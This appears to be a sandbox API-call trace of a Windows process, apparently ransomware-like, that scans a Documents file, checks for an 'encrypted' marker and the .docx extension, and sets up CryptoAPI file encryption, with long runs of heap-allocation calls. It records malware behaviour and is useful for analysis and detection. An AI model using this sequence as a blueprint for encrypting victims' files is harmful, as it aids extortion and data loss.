3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.963] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="zldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ldtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dtrs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0036.964] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1nh.docx\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0036.964] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 1 [0036.964] TranslateMessage (lpMsg=0x6aefc4) returned 0 [0036.964] DispatchMessageW (lpMsg=0x6aefc4) returned 0x0 [0036.964] Shell_NotifyIconW (dwMessage=0x1, lpData=0x6ae660) returned 1 [0036.967] KillTimer (hWnd=0x50134, uIDEvent=0x1) returned 1 [0036.967] SetTimer (hWnd=0x50134, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0036.967] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0036.967] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0036.967] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0036.968] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0036.968] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0036.968] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.968] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.968] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.968] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0036.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.968] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb456a080, ftCreationTime.dwHighDateTime=0x1d568d0, ftLastAccessTime.dwLowDateTime=0x6ef70c0, ftLastAccessTime.dwHighDateTime=0x1d5a02f, ftLastWriteTime.dwLowDateTime=0x6ef70c0, ftLastWriteTime.dwHighDateTime=0x1d5a02f, nFileSizeHigh=0x0, nFileSizeLow=0x1550b, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="zldtrs1nh.docx", cAlternateFileName="ZLDTRS~1.DOC")) returned 0x7c2100 [0036.968] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0036.968] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.968] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.968] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.968] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0036.968] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.969] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0036.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0036.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0036.969] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.969] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0036.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18a0 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0036.969] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.969] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0036.969] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.970] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.970] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1670 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.970] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.970] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.971] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.971] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.971] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0036.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x7ae928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.972] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContext") returned 0x0 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x15) returned 0x7ae928 [0036.972] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x7ae928, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0036.972] GetProcAddress (hModule=0x754b0000, lpProcName="CryptAcquireContextA") returned 0x754b91dd [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.972] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0036.972] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0036.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.973] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0036.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0036.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0036.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0036.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0036.973] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0036.973] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc28 | out: hHeap=0x770000) returned 1 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9b8 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.974] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.974] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0036.975] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.975] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 